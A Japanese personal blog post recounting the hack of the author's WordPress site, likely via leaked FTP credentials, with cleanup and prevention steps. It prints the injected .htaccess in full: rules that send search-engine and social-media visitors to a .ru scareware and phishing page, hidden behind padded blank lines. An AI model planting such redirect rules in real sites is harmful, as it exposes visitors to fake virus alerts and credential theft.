closeこの記事は 5 years 10 months 15 days 前に書かれたものです。
最新の情報ではありませんのでご注意ください。

ずーっと休んでいた日刊を1か月ぶりに更新して、何者かに『改ざんされた』事実が発覚したのでした。
いつも日刊の更新にはiPadを使っていて、メールでWPへ投稿、15分に1回の割合で自動反映させています。
今日はその15分が待てず、即反映させるために管理ページで作業しようとしたら、「あれ?」と。

管理画面にログインできないのです。
自分では設定もしていない別のページへなぜかリダイレクトされたためでした。。
「powerprogramm.ru/…」というわけのわからないアドレスがステータスバーにありました。
そこで少し待つとどこかのページに飛ばされ、再度ログイン画面が出てきました。
WPのとは少し違うログイン画面なのですが、CSSが働いていないから崩れているのだと思い込み、
動揺してIDとPWを入力してしまうというお粗末な行動を。。
あとから我に返って、このログイン画面のアドレスがpowerなんちゃら~だったことを思い出しました。
当然PWは変更しました…動揺してたとはいえ、うかつでした。反省です。

まずはもう一度おさらい

8月8日の夜にTOPページにアクセスして外見上はいつもと変わらなかったのを確認していましたが、
それから1日半ほどはブログにアクセスしていませんでした。
結局、あたしがこの緊急事態に気がついたのは10日の15時くらいです。

何度かログイン画面を見て、先に進まぬ画面に留まってもしかたないので、
そのあとTOPページに戻ろうとしたらいきなりこんなページへ。。

SystemScanner

これは SystemScanner というツールを装ったページです。
一見、Windowsのアラートが出てウイルスいるよーっていうものなんですが、
日本語OSを使用してるのになぜか英語で書かれてるし、しかもドライブがCしかないとか。。
というか、ブラウザにあるんだもん、完全にWeb上にあるっていうのがバレバレじゃないですかw
Win歴14年ですが、WindowsUpdate以外でWebにアクセスしてどうのという場面には、いまだかつて遭遇したことがありません。
そういうシステムになりましたよって正規の告知もありませんし。
大体勝手にやるとか、普通あり得ません。仮にMSがそんなことしたらすごい非難を浴びるんじゃないでしょうか。
でもきっと、びっくりしてあわててクリックするのを誘ってるんだろうな。
あたしも単に英語だけに着目したなら、動揺してクリックしてしまいそうでした。
でもドライブ数が全然違うので、こりゃあたしのPCじゃないわって思う余裕ができまして。このページについては事なきを得ました。

思い当たる節が色々あるけど

こんなことになって、真っ先に頭に浮かんだのはPSNの顧客情報漏えい事件。
でもあんなところにレンタル鯖のPWなんか記入しませんしね。。
もちろんそこからPWに繋がる手掛かりになるようなものもありませんし。
でも最近、他のところにPW書いたりしたよなぁ。そういやFFFTPも愛用してる。
ってことで、FTPの情報はどうやって漏れたのか?気になるところですが、
改ざんされたかもしれないファイルを特定して、修正か場合によっては排除しなければなりません。
漏れた場所や原因を探る前に、まずはそちらが優先です。

ブログの正常化

PHPファイルに何かコードを仕込まれたためにこんなページになったのかもと思い、
FTPでルート上とwp-adminにあるPHPファイルを見ましたが特に変わった様子はありません。
でも、しばらくいじってない「.htaccess」の日付が新しかったので不審に思い中身を見ると。。

2011-08-10_185513

RewriteEngine On
ErrorDocument 400 http://どめいん.ru/make/index.php
ErrorDocument 401 http://どめいん.ru/make/index.php
ErrorDocument 403 http://どめいん.ru/make/index.php
ErrorDocument 404 http://どめいん.ru/make/index.php
ErrorDocument 500 http://どめいん.ru/make/index.php
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://どめいん.ru/make/index.php [R=301,L]

ご丁寧にも、このコードの文頭・文末にはそれぞれ50行ほど改行が仕込まれて、
ファイルを開けただけではわかりにくいようになってます。
スクロールしてよかった^^;;
こいつのせいでリダイレクトされてログインできなくなっていたのでした。

ちなみにここで http://どめいん.ru/make/index.php なんてドメイン名を隠したところで、ドメイン名のタグをつけてるんで無意味かもしれませんがw
でもこれ、探し当てるのにちょっと苦労したんで、せめてタグだけでもと。。
ということで、粘り強くこの中身の具合をぐーぐる先生で調べました。
その結果、WPにおける.htaccessの改ざんについて書かれているページを発見しました。
ぐーぐる先生、毎度のことながらお手柄ですっ!

htaccessファイルの改ざんについて at フォノクラフト株式会社

このブログによると、

FTPログやアップロードされたファイルオーナーから察するに、
おそらくFTP情報が漏れて改ざんされた可能性が高い。

とのこと。
やっぱりそうか。FTPの情報が漏れないとこんなことできないよね。

前述しましたが、実は、iPadのアプリでFTPの情報を入力していたのです。
そのアプリから漏れたという確固たる証拠がないので名前は伏せますが、
注意喚起ということで『HTMLエディター系』であることを記しておきます。

改ざん&残していったファイルの日付は、このアプリに情報を入れた数日後でした。。
まぁ、証拠がないので疑いがあるとしか言えないのですが。。
それに、FFFTP使ってるんですよねー。
セキュリティ的に問題があったのは知ってたけど、起動時に認証してくれる最新版を入れたから大丈夫かなって思ってたので。。
10年以上使ってきたし、いまさらこれが原因?!とか思えないんですが。

とりあえず、セキュリティの問題は念には念を入れないとダメですよね。
自分だけなら自業自得で済むけど、拡散させてみんなに迷惑をかけるかもしれないと思うと、ホント怖いです。
セキュリティに関しては自分は大丈夫だろうと思っていました。
ローカルはもちろんだけど、自分のスペースにしても、こんな弱小なところは大丈夫だって。
そう思ってたんですが甘かったですね。
まぁ、こんな小さなところに仕掛けて何のメリットがあるのか理解できないですが、考えを改めます。

それと、置いていかれたファイルがこちら。

2011-08-11_011754
4日~9日に置いていかれたようですねぇ。
htaccessに気がつかなかったら、多分置いていかれたファイルにも気づかなかったかも。。

えーと、この中のforum.php.htmというのは置いていかれたファイルではなく、
http://どめいん.ru/make/index.php にあえてアクセスし、ソースを保存したものです。
リダイレクトされた時はSystemScannerのページが出たはずなんですが、
直接このページをURL入力してみると404エラーになってましたね。
なので仕方なくソースを保存したわけです。
中身はの囲まれた部分に数字の羅列しかなく、あたしには理解不能。

そういえば、base64_decode を使ってるファイルもありました。ホント悪質ですね。
これを解析してくれるオンラインツールのサイトで見てみたのですが、文字化けでわかりませんでした。
あたしが使っていないような文字キャラクタなんでしょうか?わかりません。

とにかく落ち着くのが先決

どうせない頭で知恵を絞ってもいい案なんて出るはずもありません。
この事態に遭遇した時にはかなり動揺しましたけど、今は落ち着きました。
やっぱ気持ちを平静に保たないと、何をしだすかわかりませんしね。

とりあえず、無駄話を含めながら大体の経緯と仕込まれたものをお話しました。
犯人については残念ながら凡庸な一個人のあたしにはわかるはずもなく。。
でも、なんとなく日本人ではない気がしています。
SystemScannerにしても、びっくりクリックを誘うなら別に日本語でもいいわけじゃないですか。
むしろ日本人を引っ掛けるなら日本語で書いた方が騙しやすい場合もある。
あたしみたいに英語がちんぷんかんぷんで苦手意識を持ってる人っていると思うので。
だけどあえて英語なのは、世界全体で考えると英語を理解できる人が多いからなのではと。
そして文字キャラクタの件も、英語も話せるが別の母国語を持ってる人が書いたんじゃないのかなぁと。
だから、あたしのPCでオンラインツールを使っても文字化けして判別できないんじゃないかと。
そう思ったのです。思っただけで、それ以上の根拠はないですが。

ではどうするの?今後の対策

とりあえず、リダイレクトされたページを見てもウイルスに感染しませんでした。

2011-08-10_212147

セキュリティソフトはCOMODOを使ってるのですが、POPUPも出ませんでしたし、
何のためのリダイレクトだったんだろうかと不思議でたまりません。

でもまぁ、騒がれた『ガンブラー』ではないようでホッとしています。
※クリックはしてないので完全に違うとは言い切れませんが。

まずは、、そうですね。
FTPの情報が漏れたのは確実なので、FTPのPWを変更しました。
iPadのアプリには変更後のPWを入れていません。怖いですから。。
そして、多分それだけでは足りないと思うので .ftpaccess を導入しました。
固定IPアドレスがなければ意味がないので、固定IP用に別プロバイダと契約しました。
普段Webにアクセスする時はメインプロバイダの期間限定IPアドレスで、
FTPを使う時だけ固定IPになるようルーターの設定も変更しました。
その辺のところは後日記事にします。
それと、SFTPでもっとセキュアにやろうって思って調べたんですが、
あたしの足りない頭では理解しきれず、公開鍵をSSHで設置することができませんでした。
それはもっと理解力が備わった時に再チャレンジしようと思います。。
ですが、FFFTPはしばらく使うのをやめようと思います。
他のFTPソフトにもそれぞれ一長一短があって、FFFTPだけが漏えいするとかそういうものではないということは勉強しました。
今はFirefoxのアドオンのFireFTPを使い始めています。
漏えいの危険性があるソフトの名前の中になかったので。。
たまたまかもしれませんし、今後も漏えいがないとは言い切れませんが。

それから、WPの方からも情報が漏れている可能性は否定できないので、
ちょうど日本語WPのアップデートがあったのでしておきました。
日本語WPがアナウンスされるまで、ひとつ前のVerで待ってたところでした。

アクセス解析を見たところ、やはりFTP経由だからか、その時間帯の不審なアクセスはありませんでした。
ただ、違う時間帯ですが検索botではないアメリカやフランスからのアクセスが多かったり、
解析できないアクセスが多かったりしてちょっと気持ちが悪いんです。
ここのブログが英語ならわかるんですけど、すべて日本語ですしね。。
海外に在住の日本の方だっていますけど…こんな事件があった後ですから、ねぇ。

とりあえず今は、絶対とは言えないにしても少しでも安心が欲しいので、
そういう方には(もしいらっしゃったら)申し訳ないのですが、
海外からのアクセスがはじかれるように htaccess で設定しました。
100%必ずはじくとは言えないかもしれませんが^^;
このまま何もなく時が過ぎれば、またアクセスできるように戻します。

レンタル鯖のアクセス状況についてはこの後見ていきたいと思います。
こちらの方では何か情報が得られるかもしれませんが、
この事件が発覚してから、何時間もずっとPCに向かっていたため腰痛が。。
そんなわけで集中できそうにないので、後日ゆっくり見ようと思います。

そんな感じでした。